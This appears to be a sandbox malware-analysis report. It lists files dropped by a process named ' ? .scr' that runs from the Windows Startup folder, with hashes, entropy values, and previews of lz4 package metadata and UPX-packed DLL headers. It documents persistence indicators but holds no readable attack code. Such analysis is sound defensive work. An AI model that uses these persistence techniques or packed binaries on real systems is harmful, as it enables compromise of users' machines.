                                                                                                    Size (bytes):1523
                                                                                                    Entropy (8bit):5.162397061365918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oY3UnzobbOmFTVJcFTzA6GLQrBTP49H432sZEOkHs8nRO632smyxtTfr10VZlQfS:ROmJIJzSEP6H432smp32smEtP10VwHy
                                                                                                    MD5:2F7382E069BEAC97D607124540FD5661
                                                                                                    SHA1:1684541BA4AF5542BA7E6490C25882CA125A1C47
                                                                                                    SHA-256:A7D65D1DD4DCC86DCA5D17D46AA4A1C77669C9B72F55F298E9E2212F2905C0CF
                                                                                                    SHA-512:4BD08A47B9B67098E38895E96136B3A5EE4711DEF8EB6AC87B522F2A024FC7F22EA4B53E048C2BB3F636EA81CD0814B53B4E20361EBC1A8CDE1C8E57F7A76089
                                                                                                    Malicious:false
                                                                                                    Preview:Copyright (c) 2012-2013, Steeve Morin..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are met:....1. Redistributions of source code must retain the above copyright notice,.. this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright notice,.. this list of conditions and the following disclaimer in the documentation.. and/or other materials provided with the distribution.....3. Neither the name of Steeve Morin nor the names of its contributors may be.. used to endorse or promote products derived from this software without.. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"..AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE..IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE..ARE DISCLAIMED.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3758
                                                                                                    Entropy (8bit):5.092767270997029
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:DdPHo8lGovhSaWMqCBAInB8fhfxF914CAXTzbIYB/HF4s1LWlAjC:tHoczVBAu6fhft15AzjlLLC
                                                                                                    MD5:3D855AD86A99255B3248D88C524148FC
                                                                                                    SHA1:1ADBA31F74CC4BA33AD9AE31EE29CABA66EB4D93
                                                                                                    SHA-256:612E3D4394DFDCA3E93C74FF02ABC012757279F7BA879D875BEE58F643A45FFE
                                                                                                    SHA-512:99E0C5E2DD734CBB653FDFC80C8F568EEEFAAAEF83BA92431DCE97770077759A0550FA6FC58EC3F86C67774CA9F02C0EC33164B4471DB2D659202979C868A4EF
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.1..Name: lz4..Version: 4.3.3..Summary: LZ4 Bindings for Python..Home-page: https://github.com/python-lz4/python-lz4..Author: Jonathan Underwood..Author-email: jonathan.underwood@gmail.com..Classifier: Development Status :: 5 - Production/Stable..Classifier: License :: OSI Approved :: BSD License..Classifier: Intended Audience :: Developers..Classifier: Programming Language :: C..Classifier: Programming Language :: Python..Classifier: Programming Language :: Python :: 3.8..Classifier: Programming Language :: Python :: 3.9..Classifier: Programming Language :: Python :: 3.10..Classifier: Programming Language :: Python :: 3.11..Classifier: Programming Language :: Python :: 3.12..Requires-Python: >=3.8..License-File: LICENSE..Provides-Extra: docs..Requires-Dist: sphinx >=1.6.0 ; extra == 'docs'..Requires-Dist: sphinx-bootstrap-theme ; extra == 'docs'..Provides-Extra: flake8..Requires-Dist: flake8 ; extra == 'flake8'..Provides-Extra: tests..Requires-Dist: pytest !=3.3.0 ;
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1224
                                                                                                    Entropy (8bit):5.864447015819705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:on/2zDBvNGAt5OjUyWovNKl1xp+IkEk02AJYvkPnqxv3X54nHkfIHx+8lFc:onuXBZqjUhoYllz2EYkqxvH54nEIHx+b
                                                                                                    MD5:8EE5353C4ED3152978D14C211C1C90D0
                                                                                                    SHA1:8477996A7FE941A631130210CDD867E6EA4F1646
                                                                                                    SHA-256:E2B6815BD403B74F895406DEE860476FD4621E35E9D777339ABC35790D781903
                                                                                                    SHA-512:B07AC600CE05C189DC8046E3C8B0670EB2077E75C46F51950832D3A15480AD1BBFEE21D6F1935881A915848C28247248809160024F85090610574F0034A957D1
                                                                                                    Malicious:false
                                                                                                    Preview:lz4-4.3.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..lz4-4.3.3.dist-info/LICENSE,sha256=p9ZdHdTcyG3KXRfUaqShx3ZpybcvVfKY6eIhLykFwM8,1523..lz4-4.3.3.dist-info/METADATA,sha256=YS49Q5Tf3KPpPHT_AqvAEnVyefe6h52HW-5Y9kOkX_4,3758..lz4-4.3.3.dist-info/RECORD,,..lz4-4.3.3.dist-info/WHEEL,sha256=j9Aissza3750LQHFAQyYerNjmkEON1-8w_RaZNFtKSs,102..lz4-4.3.3.dist-info/top_level.txt,sha256=cX6_gxFUdNSo40TfxrGpTCgu7epGm3yW3m2k7irTDzI,4..lz4/__init__.py,sha256=e_8j-K4TJx38qcPNjoZP_pNDo8IpE4D2ZWl4p50iV_8,646..lz4/__pycache__/__init__.cpython-312.pyc,,..lz4/__pycache__/version.cpython-312.pyc,,..lz4/_version.cp312-win_amd64.pyd,sha256=pf0T86uIXfC3BI9klNDa090G8IhnHUyUA-7-vDpS__g,11264..lz4/block/__init__.py,sha256=DSUbS7zMlKKeLs8JO9riOBO5Q_lVoSB-nwgjfhBeXt0,71..lz4/block/__pycache__/__init__.cpython-312.pyc,,..lz4/block/_block.cp312-win_amd64.pyd,sha256=9A0-u2n4DK7cJlvfzF341GOXgtNdxLzq9qwHDw7q6zQ,76800..lz4/frame/__init__.py,sha256=ZnJ4sJ1HStPpmJpo0q_CGm9fDEui3Tt3V8DmMi68SZM,
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102
                                                                                                    Entropy (8bit):5.04607660227275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKc9nkLn:RtBMwlVCxWKLnkLn
                                                                                                    MD5:E7BF0F6A4CFAC67DCD90C0088CC32E00
                                                                                                    SHA1:50D74926EE6E3D3025A2033683E5CFD56BEDECDE
                                                                                                    SHA-256:8FD022B2CCDADFBE742D01C5010C987AB3639A410E375FBCC3F45A64D16D292B
                                                                                                    SHA-512:2F587ECE802952038556AFD14FAF26F51F608521C569BC02A08B8E66428317178A7B94CA97A43A0E067FDA5762CD158FF872C06CF38292E14DD86F9B2A9326ED
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp312-cp312-win_amd64..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:fn:f
                                                                                                    MD5:194B36A8466E4650490040D599B09C0E
                                                                                                    SHA1:4CB4A2C46E9892B8A712716F9B42537D1962BBB4
                                                                                                    SHA-256:717EBF83115474D4A8E344DFC6B1A94C282EEDEA469B7C96DE6DA4EE2AD30F32
                                                                                                    SHA-512:C55B2D3D46EC558533B4019DFFA87B1F93E7866DBCDE8D00243D8C54F1A3094933256BD25EAA0333D6EC4B308F1A4C92630BBEF6E10BE7892774DCCF5556FE77
                                                                                                    Malicious:false
                                                                                                    Preview:lz4.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9728
                                                                                                    Entropy (8bit):6.690181416544674
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:x4VS9DzxLRsv2B6Qp8kYj273QJXpHcX/:xAotLt6Qp8Za7gJXaX
                                                                                                    MD5:2792ECC8FD33E03D84A8554DC8518DB4
                                                                                                    SHA1:89465011321F5CECDAD86E6F835AA1D8D0AD13D2
                                                                                                    SHA-256:36C5354B5F4DD1BC66EBBC73474BD9D663662769833045735EC6751A3BF69D76
                                                                                                    SHA-512:1C65466454AE5DA134D7CD59D663D82CFF87E95FA8060BEFA9AA82A3793DBF8A987936DF29B04EC5B0BE42CFA8AF16F18B3E7C4C7B7B5C6BF03A042B8070C879
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y7..8Y..8Y..8Y..@...8Y..GX..8Y.@X..8Y..G\..8Y..G]..8Y..GZ..8Y.7EX..8Y..8X..8Y..Q..8Y..Y..8Y.....8Y..[..8Y.Rich.8Y.........................PE..d....A.e.........." ...%. .......p........................................................`.........................................D...`......T............@..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................"..............@..............................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33280
                                                                                                    Entropy (8bit):7.815191385594917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Aq57x9FN0In5q6c/aU3GTkSND7/p6ChOAnNAp7X:Aqlxf2eQ2DLOU4X
                                                                                                    MD5:3343D0B8C531B780B2A6B3CDA19D7B7F
                                                                                                    SHA1:BDB760D25D3D9DA136901F43D505493159FE4FD7
                                                                                                    SHA-256:53B59145C034E9374B29CDB2A9901D6591670B42306B4AB97A89E671E0F5E775
                                                                                                    SHA-512:84F76063D2BD413717BA1C247682A7F2845F87BC19048ADAD532FF79E7CABF687848356D9A9B82781ACCA5843C425DA4C0E52691BEE8065787BE7D7A6D0F76FC
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r?Xk6^686^686^68?&.80^68#!794^68}&794^68#!39:^68#!29>^68#!592^68.#795^686^78.^68..>95^68..697^68...87^68..497^68Rich6^68................PE..d....A.e.........." ...%......... ..p....0................................................`............................................\...................P..P...........4.......................................p...@...........................................UPX0..... ..............................UPX1.........0...z..................@....rsrc................~..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3834880
                                                                                                    Entropy (8bit):7.978797601932288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:hWzZtBVma9uZoFS5g9HrkpIu2NG1tA7os7SdeFZ:hWtvVVjF0g5AwcvA7osOdC
                                                                                                    MD5:4CC650D9F8C13FCEB1820D0EF9B7801B
                                                                                                    SHA1:B23BF714E99A9A6C52F72BB753B74CD525B86AF3
                                                                                                    SHA-256:DCD3779157989139D632B7D3F86736B00DEA215076755089C8D7F13955BE5E96
                                                                                                    SHA-512:6224CCC34E6D6DB9CE1A8DCBC9236D88793306FF57B722579348D53CF93B319F81C1998AF48A2AD3FD12843D8070A5E7925DCCC787160D73AB44CE77A08EAFFE
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...$.06..`........6.....................................p:...........`... .......................................6.DO....6...............0..#...........c:...............................6.(...................................................UPX0....................................UPX1.....06.......6.................@...UPX2.....`....6..T...06.............@...4.24.UPX!.$........Z...5.~ 6..J5........$#=...'..^F.;.JQA.5..]......:,'TE|-..u.}.......l...Z0...+|^..n....'...-...)..>.....t.....&...Cgi...9h.0.!...K....*..R...%..V...3.........v....f. .HSi?....H..E.......+..../..NA.....m.&!.I&'.Z........(..U..w..>.r..k...Z...+.8&.E...J...&.3H.P.N"/s":..X....T.xM....z..A...F.....u..IF...kZ..4)..."..&..h...,...zJ...3..S..Gg.M.a.D4K....<......;C..m.../.z.+..R...adp.F..8.i...e`.Z.q.\.'....5{...b.(.:.H>?.}.........B.V3.....".r..D
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):585384
                                                                                                    Entropy (8bit):6.565977665822063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:SSTTigI46Bb3SUPvRgrKtzL4oaQEKZm+jWodEEVPLwtQi:SUStZaQEKZm+jWodEE9CQi
                                                                                                    MD5:4DC9DA003ED0E3E9E7CFF3B1109470E3
                                                                                                    SHA1:55A06DD5DBB0FE4E4762F1871903134EDD3EC7A4
                                                                                                    SHA-256:66FA570BD6B879AA491F6E45A3E576C3EC7F5FE31ED0EBA8B7D81F88C3B01680
                                                                                                    SHA-512:BDCA95ECB2BE5A5E14C650E8776914DAB60D277E923F3CAFC56B77C3D8055C72B2DDC45D8B3EF1B5BD8D9F52BA097C595AD25E07AB847B6CFEFF9858C5D6A42A
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H...0...H...0...H...H...H......H......H......H....._H......H....w..H......H..Rich.H..................PE..d...c/..........." ...(.6...X......0.....................................................`A.........................................2..h...X...,............p.. :...v...x..............p...........................`...@............P..x............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...p8...0......................@....pdata.. :...p...<...,..............@..@.rsrc................h..............@..@.reloc...............l..............@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29696
                                                                                                    Entropy (8bit):7.778765894518238
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:iRprYzXrZOQCMxbPYSZd+AQXDc85NrxpN:ibYzVOziQSZd+A2c8/rx
                                                                                                    MD5:731F7E7BCF284B4A6F40D48941E44DF4
                                                                                                    SHA1:7714BF03D7E27FDA747379005EE2EDCF1519ED2F
                                                                                                    SHA-256:D00ADFB9F3EC9C027462AA5EDA9AADD788804DAACD1BF1532F90AF2DCC70EBF1
                                                                                                    SHA-512:FF2DCF0939FE7F5428490163991820E3784FFC7CA876802063F58FEA065756E791D63759D9480CCFC669DA5205995AFC18143ABEA690F1DE4F55A731093CE15C
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....p..........0_....................................................`..........................................r.......p............... ...............s......................................0k..8...........................................UPX0....................................UPX1.....p.......n..................@...UPX2.........p.......p..............@...4.24.UPX!.$....w...X.W;..._......I......&".2A.s3...DLN.M...nU....p..~C+..Bg..>aK.g.ca]I@.~.....\.H.l/..D?...T..D.....TW..-QeDK...5.k..^+. 9?.e.........=.~....<o.>y.H..c.^.Y..}|..m2<~O..Skg.(k.m..kG....q......yT.?.% .Q..U..{...}hxD~6d._.3...N...8...d..M9.s^.>u.Ac....A. ...3.:....R......{2...%h...........8t./V.Q.i..w.|.}...5q.....FY.Q|.I.....5...%\....f:...x...SW....<........b..I.[wR....H.^.@..i..>q.<....|F..b.{..t.*H.(W...5.[.d...L......{.D.+..."Q..._..L.CrMf.@.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):988672
                                                                                                    Entropy (8bit):7.877327743703955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:Fitdo4q/9iR+yVs6l+zvuy8a7vN3TFVTHwi:0tdo4QQg38CDH
                                                                                                    MD5:956819A53FFF2817155618547D8E316B
                                                                                                    SHA1:A2070E3C902F2D348225FDA0B792A139523CD7FA
                                                                                                    SHA-256:CEF9BB3B1F9E345E1F156830E38D8A9EEE0BC7FD65BDE48CDE23DCD8F20ACD27
                                                                                                    SHA-512:EF163C7AF7136B2EB47561048CD33D89E0E2E1F19231C60538C0D71664B1556DC74BDC966810E8287FD023F8201C3A85C4B76885A7F0B97D115A0B5D0596BA90
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..............3.`pA.. 3..................................@B...........`..........................................4B.t....0B.............. ?.h...........`5B.(............................|A.(....,B.8...........................................UPX0......3.............................UPX1......... 3.....................@...UPX2.........0B.....................@...4.24.UPX!.$....Q..FJ.VA.;P...|?.IQ.\.....AJ...*}Db..*...WK.....j4B.5.....P.A/r....oy..,..9....h......jaP.Tu.+....:^......L].L..r{..36S....N.....F3....a.3...#W...!*.{.....<m.D....p..{..G"...~...+.27Qc+5C"a...V....+}.?4.5..0....t.W....../..}]K.../)N..{~=. Ml.y..;8J...-..h).)......+t,.'.9tJ...6}.d..>.p<Cl~K.Tv..(.5RO.....w.1E.d..@`..L0...I.......P..T.7.OfC .c,..xM.u...P....:..M1..l<GK........0...qI..v..I%e5.".<.....$q....(..1.$.......YQ.DH.kF.....=..5..`..4
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90112
                                                                                                    Entropy (8bit):7.95798344108863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:fJoS4tpDyzbGXBPaaR5/6n7eGYNUZC3/QesztRQttvNjxl1s8kL:z4tpDmGXpNR5SiBNUEszMtTjHbk
                                                                                                    MD5:8DCCAC58F02DBF1D8F51EA901E8BB487
                                                                                                    SHA1:672C449DCAEF581F43B8CBC63BEEF4E0E8474C73
                                                                                                    SHA-256:82151403A057AEFA1DE18E8D2F11E080C6DADB737E05269F34BA0307D00B20A6
                                                                                                    SHA-512:66269EC25633EF34C4832C2EF56FE6408AFC9BD7867F33912A3119E3834A05DA011EDB9B6D428A3BF59150A183B7D86EC9951202060A444F7387DA2BF4C4AB04
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....`.......0.......@................................................`.............................................p....................P..X......................................................8...........................................UPX0.....0..............................UPX1.....`...@...Z..................@...UPX2.................\..............@...4.24.UPX!.$.......4@X.f...J...B..I..4...$ ..z.K..:.S.X....o\t/....?.....+....S.f....TG..<_1. .n#....q.....b.!..T\. q.oo.Q..6e......1......o&.....O..\..JK.5j..Tx|T.....9.{.Uw........Pe..c.......I].Q....o..-J....Bu.B$,]..e.q...F...F...E..L..d2...K.........W2..k.....Ea_c..+..}7.....*4..V...n.8.....%DMs..B.....-9..E..3...p..T..5.U.xQ-..$I.)...:{.....HS...+.-&K8'Bw..).\A}.H.pfr....l...6.r[0 ...i.ql.g}.....)}:.b.....s.j....[[.(.@..PI.*.=..../...*.&.m=..t..*._J_Tj]8./..!....
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38912
                                                                                                    Entropy (8bit):7.854004082336397
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:U1Verj7WltWeH6AtxjgO/gGY4Z+cWdffEOPhZOG0wXJm85lvPrpFH:U1e7eaAT06Z+cAMOzFY85lvP7
                                                                                                    MD5:AFDA298D3F117501527E035F518EC85B
                                                                                                    SHA1:B1335E9B9308A9C803EC8506076AE72BB6ED235D
                                                                                                    SHA-256:FBA059F66680A43A501E46C62168AB76AF3FDBAFD68E9431998301E9BB01BD2A
                                                                                                    SHA-512:B2694B4127595CCB81C9422E3F4414E8A761860BE4ADA0EE1291EC8FAEF59492466FF99010C0FF8D2112590E23393069472E0B9FE70820A9ED63EBF53778536C
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".............`.......p................................... ............`.............................................l.......................................$.......................................8...........................................UPX0.....`..............................UPX1.........p......................@...UPX2................................@...4.24.UPX!.$...'.Q..............I..n.....ZFP.>.g.6.".....AC.b.Ok...{>.s..#1....vj..JDm..97.o;.. .....$,.......;,..l.....f..}l.m.8.^g....|..2.......m....j>...V.9.&....SI.2x..B.+XZ......I.....(.......I,I.....U.Np....h.7.S..Q.CL*..R.%....].....+[g$TqR.uP.R.m..9.{.CN. aK..0K.l..j. ...[.L......96........i.^3.....PG..<.....>..{.KF.P..`.....~.).b...p..H.,. .S0V..}..qgX,..........@AJ.t.D.w..9.V.J.F....`..g.1...e.6.2..n......d..6...;.o_.U....8..nhb.[..6*.$.NI..../czyOT
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76800
                                                                                                    Entropy (8bit):7.946939316069785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:SqZnCI1F3opcrcdxOjBkKkEBl7+h8X/nFj88cw488FU7aKa8oLaV17RBa:SqZnF1FaScdxI6Kc6Fj88cHWua/
                                                                                                    MD5:B4E4E9B1238C07DDAF64C2BD0C19C52A
                                                                                                    SHA1:053161AD298203933293E7206EF254582A2D87D0
                                                                                                    SHA-256:EB7CDE409C434D5BC0E596A82A273E4DB8982B1D6A2CC34E9EC421154B03F6E3
                                                                                                    SHA-512:B046B9792320318CE6E016FE932394531AFDC559BEE390C9494C67A615C368ADD25C8587756DC82B43007DF799306C8CD7D1CB96C17C1A01317052461A02B8F6
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..... ..........`.....................................................`............................................. ...........................................................................`...8...........................................UPX0....................................UPX1..... ....... ..................@...UPX2................."..............@...4.24.UPX!.$......#......1....t..I...... .D&.(..'....O...'. `..../?..pm.^...[..m.../?..[._.P:%.....]A{)P}^..3.wf...q...........lR.....K.......E...n.m.+...s?.G..qTp....Q.../...../.B...Ce.x.&...WG-ZG..0[.7..]B.CaX..1..[@2R/..*...5.>..3....I.w....=.....deu.xm.+.b8.+.V.!....y."<'..L.=.k.6....m8..<;....G.......Ek..x.u...>NG.D...Htw..p.2.S.=..*...{.Nf.H........Q.!..NX...7......L_8..?FB,B......y(..d...g....l.....J+[....t..W.. ].e....&..r.M..M...>.0O....q..b....0...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):59392
                                                                                                    Entropy (8bit):7.920607886837034
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:NxuefqZJI/kmkJ42miIVecI/l5suxy82R359Jm:w0km+42mi7voG
                                                                                                    MD5:A5405F8C8A93D74E49A282D8D3BED170
                                                                                                    SHA1:918A287CC863B157F335198687698B585F25B9A3
                                                                                                    SHA-256:091CAD3A8470D2CE1726ACC614627D6B014C02C13F53C0ADD76BFDB1BA73BBAE
                                                                                                    SHA-512:82182566C6F99D56CFCE67D0EF94ABF6F0DE84F1BF79E8CF313536D5E53A08BF46C47E6F0538FDEBC9F1EE510CC1C45594C04FFB40732F2DC221E63830292759
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..................... ................................... ............`.............................................`...............................................................................8...........................................UPX0....................................UPX1......... ......................@...UPX2................................@...4.24.UPX!.$..{_.J...............I......$"J.@.}:I.uj..a."c.}p>.>...Z+..O.$."..5......:..e....H.[^.._..yr..[.b$(.............K?.@......._.;....\.\..q...z4.c.:.zP,.w.eG~..".B.i..i<.N..lFJ.......Sr..?@..Y..a..^FD.%=w.l...D.EmH.q.J.aRsM@2.P......`....&.H..4....].F?......8....;9.<........bC:..;.B.J..6.J-P.........]x.6[......O,C...>........!....kt...P.}.Xu....ZS...E.4..:...6.J....n.C..C.r..M.N.@g.........Ml.....}o4..Hhc."...:.Y}..............8.+z.|n%.....r..\..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):196608
                                                                                                    Entropy (8bit):7.987464751664771
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:E54uTxC8c/1WDwuYGkH5ScrdHlATnMuAqu5xAUc9OyxoIxrSLsugn8G8uGM2:yg1WDwPGKxRHKTnbu5xAnOyTGL/iav
                                                                                                    MD5:CCBFCA02822393A53B1E18DDB7BBBAD4
                                                                                                    SHA1:F26268EF3F92292280A7B58C46CEFE3B3E7D3A07
                                                                                                    SHA-256:F5B7194887D004DA18DD913F932DF00A2C2DB1339D83B9B7F59FA638C799C8B2
                                                                                                    SHA-512:85E3FE89E5DECC0D88B4B7BAF0670D01B8A1DC873A251ACC90E08F4BFA5D7CD6C969D5F66115267BF124393477D0F565D3FC3011B4749B7D915550C7E0F486D6
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................ .....................................................`.........................................@...........@................................................................... ...8...........................................UPX0....................................UPX1................................@...UPX2................................@...4.24.UPX!.$.../.p8.Q.b........j..I$.%...$". .tb.p..I.>...s.... w1..ZC..T.g!G....It..?../..v8.m...p+...83......_.v..l."...Xq.u=F....17.<...a...|v....=.Ff...L..Y#Cp.N9.n?R..R......f.T._.Vj&#.X.W.!6.........`].w.Q-P.K#Q.G.l=.m[... ..q.*.....)....*..!.o.s.6..7N.._`..Bb.H.#.,..C.*....4...7....<.@.."4.....1;^...b..!.6...uJ,,@.M..@....q.......te..@Y.....Si...0-..L...E..R`.*..`......J..a..S..l+....QK..r;.c.......h..h..B..f.\..A.uZ...Z.<l}rK..&.. ......3L.D.&$...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40448
                                                                                                    Entropy (8bit):7.866984491227402
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6AblVqWmaPFY+Pb0pDq8ft5oj4aokvs/tj12+Gvg/LHsIe286tBqwpA:LblkaPFDPbMq81Gj/vspc+PHxPjtE7
                                                                                                    MD5:D0D2BFF38D39B4C55D896A9EAAF7D336
                                                                                                    SHA1:993B3E5954A5FC61C833CB6DE343C5A9D7A8C093
                                                                                                    SHA-256:CA1E31DF27E24473C5E649C536A9BF63345D0DF4E7D6C6B91A5C4FAAF87735A6
                                                                                                    SHA-512:59A003D5E9A17D13818E0F2908FC19A3F660BCC74B7950C7CA7A23EEC289E7E628BA69DE5D71A143DB83897CC36579E82730D3E4F683A7C2284DF3A108E3D9F0
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."............. ..@....0................................................`.............................................`.......................(...................................................@...8...........................................UPX0..... ..............................UPX1.........0......................@...UPX2................................@...4.24.UPX!.$..%,!....|........\..I......$!VGPm..:f.......3.M.'.....:......h..5....i....2..~&.../.7MIh83pu...D@.)..i&.Z..Q.~..\y9.........z..;..?...,.e&&..m<...k...[D-.].#i.6..Pr{.3.\5L........N(..r..&;.${..O8N..i..T.O....w.....:Syn....F.....I...>..:R....Y-?.|.Q+v{j.Kh5.p.....:e..D7%.C0...O'w5.U..Q.".].......S.q.NL...4,.$.&..d.A..L....f.V.;gn..s_...}`.....8n...E..8..Ej.......b..Qs=....AS...Pz...u..Y .=.g...r..........Ue[t.....J...]L.........D..E...h..A0....6..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36864
                                                                                                    Entropy (8bit):7.856606210337219
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:wlgBkCyUoBEzzDAsVAk4IPAMyZwEV+Q1PL7zllIlHSn3unpf/m:p2nUfzDAZkRA7GQ1PzAoeBm
                                                                                                    MD5:FCE0EE2745B39765442885C621B16FE0
                                                                                                    SHA1:4CC4681DDDDFFF5336CDAC33694E063BE3339467
                                                                                                    SHA-256:C7A4E611C4BF6C8B14AD3092CFCA68A3292EA81FD206B903400727653A5D4444
